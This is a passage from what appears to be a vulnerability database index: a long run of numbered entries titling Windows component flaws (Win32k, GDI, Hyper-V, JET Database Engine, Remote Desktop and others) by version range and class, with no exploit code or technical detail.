2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption 